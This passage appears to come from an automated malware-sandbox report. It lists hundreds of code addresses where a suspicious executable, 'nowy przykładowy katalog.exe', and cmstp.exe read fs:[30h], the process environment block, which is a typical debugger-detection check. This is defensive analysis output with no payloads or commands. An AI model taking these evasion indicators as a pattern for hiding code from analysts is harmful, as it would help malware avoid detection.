          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A85BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A6D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A88B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A36CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A36CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A36CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A714FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A88CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A8740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A8740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A8740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009D746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A4C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A4C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A68DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A36DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009CD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009CD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A3A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A88D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009D7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A33540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A346A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A80EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A80EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A80EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A4FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A6FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A88ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A6FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A37794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A37794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A37794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A8070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A8070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A4FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A4FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A88F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009CEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009CFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04702073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04711074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04660050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04660050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046DC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046DC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04714015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04714015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0471740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0471740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0471740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046458EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_047014FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04718CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046DB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046DB8D0 mov eax, dword ptr fs:[00000030h]
